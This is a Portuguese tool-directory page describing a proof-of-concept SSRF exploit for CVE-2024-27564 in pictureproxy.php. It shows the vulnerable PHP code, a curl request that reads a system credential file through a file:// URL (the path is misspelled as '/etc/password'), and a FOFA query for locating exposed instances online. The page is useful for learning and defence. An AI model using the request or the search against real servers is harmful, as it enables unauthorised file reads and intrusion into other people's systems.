Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
SSRF-Exploit-CVE-2024-27564 — Exploit de prova de conceito para CVE-2024-27564, demonstrando SSRF via parâmetro de URL não validado em pictureproxy.php. Inclui teste baseado em curl e busca FOFA por instâncias vulneráveis. | Kitploit
Ferramentas/GitHubGitHub/chaudhrymuhammadtayab/ssrf-exploit-cve-2024-27564
ReconhecimentoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubchaudhrymuhammadtayab/ssrf-exploit-cve-2024-27564

SSRF-Exploit-CVE-2024-27564

Exploit de prova de conceito para CVE-2024-27564, demonstrando SSRF via parâmetro de URL não validado em pictureproxy.php. Inclui teste baseado em curl e busca FOFA por instâncias vulneráveis.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
1há 1 anoAinda não revisado

SSRF-Exploit-CVE-2024-27564

Título do Projeto

Este projeto demonstra uma vulnerabilidade de Server-Side Request Forgery (SSRF) no arquivo pictureproxy.php.

Descrição

Uma vulnerabilidade no pictureproxy.php permite que atacantes remotos realizem requisições arbitrárias injetando URLs no parâmetro url. Esta vulnerabilidade SSRF pode ser explorada sem autenticação, tornando-a particularmente perigosa.

O código vulnerável está no arquivo pictureproxy.php. O problema ocorre porque a função não valida adequadamente o parâmetro url. A variável $_GET['url'] é passada para a função file_get_contents(), que busca conteúdo da URL especificada. Isso pode levar a SSRF.

Prova de Conceito

Aqui está uma prova de conceito simples que mostra como a vulnerabilidade pode ser explorada:

root@kitploit:~
<?php
if (isset($_GET['url'])) {
    $image = file_get_contents($_GET['url']);
    header("Content-type: image/jpeg");
    echo $image;
} else {
    echo "Invalid request";
}

Para testar a vulnerabilidade, você pode usar o seguinte comando curl:

root@kitploit:~
curl -i -s -k http://127.0.0.1/pictureproxy.php?url=file:///etc/password

Testado com Open Redirect

Um teste usando uma vulnerabilidade de redirecionamento aberto:

root@kitploit:~
https://64.media.tumblr.com/f07b73b374dc2ff6d5e4dbf39d2a6467/tumblr_nvani31DCm1u5url1o1_1280.jpg

Banner

Ferramentas

  • FOFA: Um mecanismo de busca para dispositivos e vulnerabilidades na Internet. Use o seguinte comando para pesquisar resultados relevantes:
root@kitploit:~
"title="ChatGPT个人专用版""

Conclusão

Este projeto destaca a importância de validar adequadamente as entradas do usuário para evitar vulnerabilidades SSRF. Sempre garanta que parâmetros como URLs sejam minuciosamente verificados antes de serem processados.

Baixar ferramenta